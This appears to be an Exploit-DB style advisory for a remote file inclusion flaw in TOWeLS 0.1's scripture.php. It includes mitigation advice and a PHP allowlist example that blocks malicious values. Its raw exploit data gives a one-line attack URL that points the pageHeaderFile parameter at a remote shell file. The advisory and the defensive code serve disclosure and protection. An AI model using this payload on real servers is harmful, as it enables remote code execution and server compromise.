Vendor: TOWeLS
By: milw0rm.com
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: TOWeLS
Affected Version From: TOWeLS version 0.1
Affected Version To: TOWeLS version 0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

TOWeLS version 0.1 (scripture.php) Remote File Inclusion Vulnerability

The vulnerability allows an attacker to include a remote file on the vulnerable server. In this case, the vulnerability exists in the scripture.php file of TOWeLS version 0.1. By manipulating the 'pageHeaderFile' parameter, an attacker can include a malicious file hosted on a remote server.

Mitigation:

The vulnerability can be mitigated by properly validating and sanitizing user input before including files. It is recommended to update to a patched version of the software if available.
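
One way to apply the validation described above, as an added PHP 8 example that is not TOWeLS source code: the 'pageHeaderFile' value is treated as a key into a fixed allowlist and never as a path or URL. The header file names, the `headers` directory and the function name `resolveHeaderFile` are hypothetical.

```php
<?php
// Added illustration; not TOWeLS code. File and directory names are hypothetical.
declare(strict_types=1);

// Allowlist: accepted request value => file shipped with the application.
const HEADER_FILES = [
    'default' => 'header_default.php',
    'print'   => 'header_print.php',
];

/**
 * Map a user-supplied pageHeaderFile value to a local file, or return null.
 * The request value is only ever used as an array key, never as a path.
 */
function resolveHeaderFile(mixed $requested, string $baseDir): ?string
{
    if (!is_string($requested) || !array_key_exists($requested, HEADER_FILES)) {
        return null; // URLs, traversal sequences, arrays and unknown names
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . HEADER_FILES[$requested]);
    // Defence in depth: the resolved file must exist inside the base directory.
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

// Constructed sample inputs, including the value shape shown in the advisory.
// 'default' resolves only if headers/header_default.php exists next to this file.
$samples = ['default', 'http://localhost/shell.txt?', '../../etc/passwd', ['x']];
foreach ($samples as $value) {
    $resolved = resolveHeaderFile($value, __DIR__ . '/headers');
    printf("%-34s => %s\n",
        json_encode($value, JSON_UNESCAPED_SLASHES), $resolved ?? 'rejected');
}

// Hypothetical use in the including script:
// $header = resolveHeaderFile($_GET['pageHeaderFile'] ?? 'default', __DIR__ . '/headers');
// if ($header === null) { http_response_code(400); exit; }
// include $header;
```

Keeping `allow_url_include` set to `Off` in php.ini (the default) additionally stops `include` from fetching URLs, but it does not prevent inclusion of unintended local files, so the allowlist is still needed.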

Exploit-DB raw data:

TOWeLS version 0.1 (scripture.php) Remote File Inclusion Vulnerability
http://sourceforge.net/project/showfiles.php?group_id=126659 / towels-0.1.zip /
/towels-0.1/src/scripture.php?pageHeaderFile=http://localhost/shell.txt?

# milw0rm.com [2007-10-22]